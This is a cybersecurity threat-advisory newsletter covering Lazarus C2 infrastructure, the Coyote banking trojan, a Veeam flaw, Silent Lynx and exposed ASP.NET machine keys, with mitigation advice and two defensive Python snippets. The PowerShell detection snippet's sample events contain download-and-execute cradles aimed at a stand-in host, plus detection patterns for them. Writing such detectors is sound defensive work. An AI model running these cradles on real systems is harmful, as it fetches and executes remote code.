North Korean Hackers Exploit React-Powered C2 Infrastructure for Global Attacks
- SISA Weekly Threat Watch -

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents highlight the growing sophistication of threat actors, including North Korea’s Lazarus Group, which exploits a React-powered command-and-control (C2) infrastructure to target cryptocurrency developers via LinkedIn job scams and trojanized software packages. Another major attack, the Coyote Banking Trojan, is using LNK files and PowerShell scripts to infiltrate banking applications, steal credentials, and evade detection through registry modifications. Meanwhile, Veeam has patched a critical vulnerability (CVE-2025-23114) that enables Man-in-the-Middle (MitM) attacks, allowing arbitrary code execution on backup infrastructure. Additionally, Silent Lynx, a sophisticated cyber-espionage group, has been targeting financial and government institutions in Central Asia using multi-stage malware, Telegram bots, and Golang payloads for remote access and data exfiltration. Lastly, Microsoft has warned about ViewState code injection attacks exploiting publicly exposed ASP.NET machine keys, leading to remote code execution (RCE) on IIS servers. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.
SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.
1. North Korean Hackers Exploit React-Powered C2 Infrastructure for Global Attacks
The Lazarus Group, a North Korean state-sponsored threat actor, has been using a React-based web platform to manage its command-and-control (C2) infrastructure, facilitating payload management, data exfiltration, and victim oversight. Operation Phantom Circuit specifically targets cryptocurrency developers and authentication solutions through trojanized software packages, tricking developers via LinkedIn job scams that lead them to execute malicious code on corporate devices. The campaign, active from September 2024 to January 2025, compromised 1,639 victims, with India, Brazil, and France being the most affected. Attackers employ software supply chain attacks, injecting obfuscated backdoors into cryptocurrency and authentication software, alongside social engineering tactics, where fake recruiters distribute malware-laced job tests. Their C2 infrastructure, hosted on Stark Industries servers, is obscured through Astrill VPN and Oculus Proxy, communicating via ports 1224 and 1245. To mitigate risks, organizations should implement cryptographic checksums and audit third-party dependencies, while monitoring uncommon ports and VPN usage for anomalies. Security teams should investigate prolonged RDP sessions, conduct security audits on development tools, and educate developers about social engineering threats on LinkedIn, enforcing strict policies against executing external scripts in recruitment tests.
2. New Coyote Banking Trojan Campaign Exploits LNK Files for Infection
The Coyote Banking Trojan is being delivered through LNK files that execute PowerShell commands to contact remote servers. It targets Brazilian users and aims to steal banking credentials from over 70 financial applications and various websites. This multi-stage attack uses keylogging, phishing overlays, and screenshot capture to exfiltrate data while maintaining persistence through Windows registry modifications. The Trojan evades detection by checking for virtual environments and sandbox analysis before executing, and communicates with command-and-control (C2) servers for continuous data theft. The infection begins with malicious LNK files containing PowerShell scripts that download payloads, enabling multi-stage execution via DLL injection and Donut shellcode. To mitigate risks, organizations should disable LNK file execution from untrusted sources, restrict PowerShell execution policies, and monitor for suspicious script activity. Security teams must implement behavior-based threat detection, block malicious domains, restrict outbound traffic, and educate users on LNK file risks, reinforcing endpoint security and email filtering mechanisms.
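The monitoring recommended above can be expressed as detection logic over process-creation telemetry. The following is an added example, not code from SISA or from the Coyote analysis: it runs over constructed Sysmon-style records, decodes any `-EncodedCommand` argument (base64 of UTF-16LE), and flags PowerShell spawned by explorer.exe (how a double-clicked shortcut launches) together with download-cradle or evasion switches; the hostnames and paths are made up.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# The encoded command for event 1 is built here so the decoder has input.
ENCODED = base64.b64encode(
    "Invoke-WebRequest http://stage.example.invalid/p -OutFile $env:TEMP\\s.dll".encode("utf-16-le")
).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Program Files\Vendor\Agent.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},  # benign scheduled script
]

# Indicators: download cradles / in-memory execution, evasion switches, encoded command argument.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|FromBase64String|\bIEX\b", re.I)
EVASION = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass", re.I)
ENC_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return the reasons this event resembles a shortcut-launched PowerShell stager."""
    reasons = []
    decoded = decode_encoded_command(ev["CommandLine"])
    text = ev["CommandLine"] + (" " + decoded if decoded else "")  # inspect decoded text too
    if ev["Image"].lower().endswith("powershell.exe") and ev["ParentImage"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (shortcut-style launch)")
    if decoded:
        reasons.append("encoded command present; decoded for inspection")
    if EVASION.search(text):
        reasons.append("hidden-window / no-profile / bypass switches")
    if CRADLE.search(text):
        reasons.append("download cradle or in-memory execution")
    return reasons


def flagged_events(events, min_reasons=2):
    """Indices of events that accumulate at least min_reasons indicators."""
    return [i for i, ev in enumerate(events) if len(score_event(ev)) >= min_reasons]
```

Requiring two or more indicators keeps routine administrative PowerShell (event 2) out of the alert queue while both stager-style launches are flagged.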
3. Critical Security Flaw in Veeam Backup Software Allows Arbitrary Code Execution
Veeam has patched a critical vulnerability (CVE-2025-23114, CVSS 9.0) in its Backup software that could allow attackers to execute arbitrary code via a Man-in-the-Middle (MitM) attack. The flaw affects multiple products, including Veeam Backup for Salesforce, Nutanix AHV, AWS, Azure, and Google Cloud, posing a risk of data breaches, unauthorized access, and system takeover. The issue originates from the Veeam Updater component, which could grant attackers root-level permissions on compromised servers. Organizations using affected versions should immediately update to the latest patched releases to mitigate risks. To enhance security, organizations must verify network security controls, restrict access to Veeam Backup servers, and ensure secure communication channels. Regular monitoring of backup infrastructure for suspicious activity, auditing Veeam deployments, and configuring firewalls and intrusion detection systems are crucial steps to prevent exploitation and maintain compliance with security best practices.
4. A Sophisticated Cyber-Espionage Group Leveraging PowerShell, Golang, and C++
Silent Lynx, a previously unknown threat actor, has been targeting government-backed banks, embassies, think tanks, and legal entities in Kyrgyzstan, Turkmenistan, and potentially Kazakhstan, focusing on economic and financial institutions. Their spear-phishing campaigns use malicious RAR archives to deploy multi-stage malware, including ISO files, PowerShell scripts, C++ binaries, and Golang payloads, while leveraging Telegram bots for command execution and data exfiltration. The group’s tactics mirror YoroTrooper, a known CIS-focused espionage group, indicating possible links or shared methodologies. Silent Lynx’s malware delivers decoy documents and multi-stage execution chains to maintain stealth and persistence, often establishing reverse shells for remote access. Organizations should deploy advanced email filtering, restrict ISO file execution, and monitor PowerShell activity, while implementing least privilege access, sandboxing solutions, and behavior-based endpoint detection to counteract evolving threats. Security teams must investigate abnormal Telegram bot connections and track Silent Lynx’s tactics via threat intelligence.
5. Microsoft Warns of ASP.NET Machine Key Exposure
Microsoft has warned of a critical security risk where developers unknowingly use publicly disclosed ASP.NET machine keys, enabling ViewState code injection attacks and the deployment of the Godzilla post-exploitation framework. Over 3,000 exposed machine keys have been identified, allowing attackers to achieve remote code execution (RCE) on IIS servers. Unlike previous ViewState injection attacks that relied on stolen keys sold on dark web forums, these keys were freely available in public repositories, making them far more accessible to attackers. ViewState, the ASP.NET feature for maintaining page state, relies on a message authentication code (MAC) key; if that key is compromised, attackers can craft malicious ViewState payloads that the ASP.NET runtime accepts as valid, decrypts, and executes, leading to system takeover. To mitigate risks, organizations must avoid using publicly available machine keys, regularly rotate keys, verify their configured keys against Microsoft’s published hashes, enforce secure coding practices, monitor IIS activity for anomalies, and implement Web Application Firewalls (WAFs) to block malicious payloads.
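The key check described above can be automated against an application's web.config. This is an added example, not Microsoft's tooling: it reads the `<machineKey>` element, skips runtime-generated keys, compares static keys by hash against a denylist, and also reports `enableViewStateMac="false"`. The configuration fragments and key values are constructed, the denylist is seeded from the constructed key, and SHA-256 as the hash of the disclosed keys is an assumption of this example.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed web.config fragments; the key values are made up for this example.
EXPOSED_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CAFEBABE00112233445566778899AABBCCDDEEFF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>"""
AUTOGEN_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps" />
  </system.web>
</configuration>"""

# Denylist of disclosed keys kept as SHA-256 hex so the tool never ships the keys
# themselves. Seeded here with the constructed validationKey above (assumption:
# the real published list would be loaded from a file in the same form).
KNOWN_EXPOSED = {hashlib.sha256(b"CAFEBABE00112233445566778899AABBCCDDEEFF").hexdigest()}


def audit_machine_key(web_config_xml, exposed_hashes):
    """Return findings about the <machineKey> and ViewState MAC settings in a web.config."""
    root = ET.fromstring(web_config_xml)
    findings = []
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        findings.append("info: no <machineKey>; ASP.NET auto-generates keys per machine")
    else:
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if value.startswith("AutoGenerate"):
                continue  # runtime-generated key, nothing to compare against the denylist
            if hashlib.sha256(value.encode()).hexdigest() in exposed_hashes:
                findings.append(f"critical: {attr} matches a publicly disclosed key; rotate it")
            else:
                findings.append(f"info: static {attr} in config; confirm it is unique and rotated")
    pages = next(root.iter("pages"), None)
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("critical: enableViewStateMac=false removes ViewState integrity checks")
    return findings
```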
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.